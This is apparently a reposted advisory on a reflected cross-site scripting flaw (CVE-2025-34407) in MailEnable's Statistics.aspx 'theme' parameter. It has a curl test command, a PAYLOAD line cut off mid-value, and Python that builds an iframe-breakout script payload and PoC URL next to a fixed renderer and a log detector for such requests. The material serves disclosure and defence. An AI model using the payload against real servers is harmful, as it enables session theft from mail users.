MailEnable, Reflected Cross-Site Scripting, CVE-2025-34407 (Medium)


MailEnable versions before 10.54 contain a reflected cross-site scripting vulnerability in the /Mondo/lang/sys/Forms/Statistics.aspx endpoint. The flaw is in the 'theme' parameter, which is read from the GET request and written into the HTTP response without being validated or output-encoded.

Because the value is reflected inside an iframe tag, an attacker can craft a URL whose theme value closes the attribute and the iframe tag, injects arbitrary JavaScript, and comments out the remaining HTML so the rest of the page still parses. When a victim opens the link, the script runs in the victim's browser in the security context of the MailEnable application, with the privileges of the authenticated victim. Consequences include theft of session cookies not marked HttpOnly, redirection to attacker-controlled sites, and injection of arbitrary HTML or CSS into the page.

Exploitation requires user interaction (visiting the crafted link), which phishing makes easy to obtain, and the missing input validation means no further complexity is involved. The CVSS 4.0 assessment rates the issue medium severity: network attack vector, low attack complexity, user interaction required, with an impact on the confidentiality and integrity of the vulnerable system and limited impact on subsequent systems.
Platform: MailEnable
Version: Prior to 10.54
Vulnerability: Reflected XSS
Severity: MEDIUM
Date: 12/09/2025

Prediction: Fixed in 10.54

What Undercode Says:

Analytics

# -G with --data-urlencode sends the payload URL-encoded, so quotes and angle brackets reach the server intact
curl -s -G "http://target/Mondo/lang/sys/Forms/Statistics.aspx" --data-urlencode "theme=PAYLOAD"

PAYLOAD: ">
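The following Python is an added example, not MailEnable's code and not the advisory's proof of concept. It models the pattern described above: a GET parameter written raw into an iframe tag, the hardened rendering (allow-list plus output encoding), the response check a tester makes after sending the curl request, and a triage function for web-server logs. The iframe markup, the allow-list, the payload string and the log lines are constructed assumptions; only the endpoint path and the parameter name come from the advisory.

```python
"""Added example for CVE-2025-34407 (reflected XSS via 'theme'); not MailEnable code.
The sink markup, allow-list, payload and log lines are constructed assumptions."""
import html
import re
from urllib.parse import parse_qs, urlencode, urlsplit

STATS_PATH = "/Mondo/lang/sys/Forms/Statistics.aspx"  # endpoint named in the advisory

# Illustrative payload shaped as the advisory describes: close the attribute and
# the iframe tag, inject a script element, comment out the remaining markup.
PAYLOAD = '"></iframe><script>alert(document.domain)</script><!--'


def render_vulnerable(theme: str) -> str:
    """Assumed vulnerable sink: the parameter is interpolated raw into an iframe."""
    return f'<iframe src="{STATS_PATH}?theme={theme}"></iframe><p>stats</p>'


ALLOWED_THEMES = frozenset({"default", "dark"})  # constructed allow-list


def render_fixed(theme: str) -> str:
    """Hardened rendering: allow-list the value, URL-encode it for the query,
    then HTML-attribute-encode the whole attribute value."""
    safe = theme if theme in ALLOWED_THEMES else "default"
    src = html.escape(f"{STATS_PATH}?{urlencode({'theme': safe})}", quote=True)
    return f'<iframe src="{src}"></iframe><p>stats</p>'


def build_poc_url(base: str, payload: str) -> str:
    """URL-encode the payload so curl and browsers send exactly the intended bytes."""
    return f"{base}{STATS_PATH}?{urlencode({'theme': payload})}"


def theme_from_url(url: str) -> str:
    """Decode the theme value back out of a URL (what the server will see)."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get("theme", [""])[0]


def script_tag_count(body: str) -> int:
    """Number of <script ...> openers in a response body (case-insensitive)."""
    return len(re.findall(r"<script\b", body, flags=re.IGNORECASE))


def is_reflected_unencoded(body: str, payload: str) -> bool:
    """The tester's check: did the payload come back byte-for-byte in the HTML?"""
    return payload in body


# Constructed W3C-style access log lines; field order assumed:
# date time cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2025-09-12 10:01:02 GET /Mondo/lang/sys/Forms/Statistics.aspx theme=dark 200
2025-09-12 10:01:09 GET /Mondo/lang/sys/Forms/Statistics.aspx theme=%22%3E%3C%2Fiframe%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E%3C!-- 200
2025-09-12 10:02:30 GET /Mondo/lang/sys/Forms/Login.aspx - 200
"""

DANGEROUS = re.compile(r'[<>"\']')  # characters that break out of an attribute or tag


def suspicious_theme_requests(log_text: str) -> list:
    """Return (time, decoded theme) for Statistics.aspx hits whose decoded
    theme value contains attribute- or tag-breaking characters."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 6 or not parts[3].lower().endswith("/statistics.aspx"):
            continue
        theme = parse_qs(parts[4], keep_blank_values=True).get("theme", [""])[0]
        if DANGEROUS.search(theme):
            hits.append((parts[1], theme))
    return hits


if __name__ == "__main__":
    url = build_poc_url("http://target", PAYLOAD)
    print("PoC URL:", url)
    print("vulnerable reflects raw:", is_reflected_unencoded(render_vulnerable(PAYLOAD), PAYLOAD))
    print("fixed reflects raw:", is_reflected_unencoded(render_fixed(PAYLOAD), PAYLOAD))
    print("suspicious log hits:", suspicious_theme_requests(SAMPLE_LOG))
```

The allow-list alone would fix the bug, but encoding the attribute value as well means a future theme name containing a quote cannot reintroduce it. For triage, decoding the query before matching matters: the payload arrives URL-encoded, so a raw-string search for `<script` in the log misses it.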
